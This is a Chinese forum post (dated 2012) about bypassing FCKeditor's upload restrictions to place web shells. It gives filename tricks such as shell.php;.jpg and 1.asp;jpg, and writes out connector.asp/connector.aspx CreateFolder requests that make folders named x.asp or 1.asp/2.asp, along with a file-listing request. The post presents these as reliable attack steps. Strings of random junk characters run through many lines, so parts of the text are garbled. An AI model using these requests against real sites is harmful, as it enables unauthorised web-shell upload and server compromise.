很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg$ d- l" y1 |. n: j& d% v1 `3 Z0 y
4 F1 e8 H7 A% }5 E提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。) _! F( L, h8 b# N# Z8 Z: o
+ y" V7 d" O; P6 G! J
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
, u- k& q# _ I7 A4 o7 J, f5 `$ P0 v* m9 j: ~8 G# ?( G; V
突破建立文件夹:- t2 T2 V- V" `+ X
" E \* M5 u1 K; Y; Z, a
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp b0 L$ y( ^' l; T$ i
% i" ]/ j) Z; h1 U- P
参数:
: k& H0 c% }1 [
0 {' T1 k! s% }4 L' L当前目录名:CurrentFolder=/qing.asp
3 }9 Z1 v' O/ }/ G; m$ O
% u! A$ l+ \3 }4 [; R) h新的目录名:NewFolderName=x.asp
$ I; M8 c" a- P: {
! @; i8 X# C, N$ I% [. g% d其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……5 _+ u2 i" S6 U1 T4 T8 [/ i+ @% [
5 d- n9 P! t% @$ Q* a
那么 x.asp 就已经建立生成了,此方法百试百灵!
9 Y8 N" v4 B- ^& z' n5 {* p& e$ J& N2 K J! l6 q
新建文件夹参数 x.asp,基本都能搞定。3 c- }* q3 L1 c( t0 e
; w2 H$ L. O9 e/ s! v
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建4 j( R y7 Y# _! [$ E b L8 z
- `4 R5 }$ n" f5 d) e
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp Y, s& h0 i: {- L4 \; U
% H4 g+ T8 K: r) m2 G, p获取文件列表+ h4 B; W- Q) S
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/ b7 L; ]# r9 ~ B
, Z& e1 p2 ^4 T5 E1 M' o2 U6 m |
发表于 2012-12-31 09:27:09
收藏
支持
反对